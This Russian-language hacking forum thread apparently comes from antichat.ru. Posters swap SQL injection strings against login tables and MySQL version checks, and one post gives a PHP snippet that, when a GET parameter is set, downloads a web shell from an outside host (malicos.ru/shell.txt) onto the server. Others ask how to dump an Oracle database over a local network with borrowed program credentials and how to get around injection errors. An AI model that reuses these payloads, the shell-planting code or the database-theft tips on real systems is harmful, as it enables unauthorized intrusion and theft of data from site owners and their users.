Assembler, тебе сюда! http://forum.antichat.ru/forum76.html

еще один вопрос)
конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
как я понимаю просто такого ид не существует?
select+top+1+start+at+2+login+from+user ругается на где то был топик на эту тему но ответа так и не увидел.
какие еще есть варианты вывести другие записи?)

mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

up. чуть подкоректировал чтобы было легче понимать

Насколько я понял тебя:
if($_GET['get_shell']=='yes')
copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
/*
file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
и т.п. и т.п.

*/

Ух блин... Это скуля? Какие колонки выводятся?

Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

Плагин к фалерфоксу, - LiveHTTP Headers

Перекопал много ресурсов но так никто и не ответил.
Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
Имеется связка логин\пасс для программ работающих с базой.
Как? Чем? Что еще нужно?

Есть скуль, на любой запрос реагирует

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат.
Подзапросы так же не работают.
Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1

Не могу даже подобрать кол-во полей.
В чём может быть проблема и как обойти?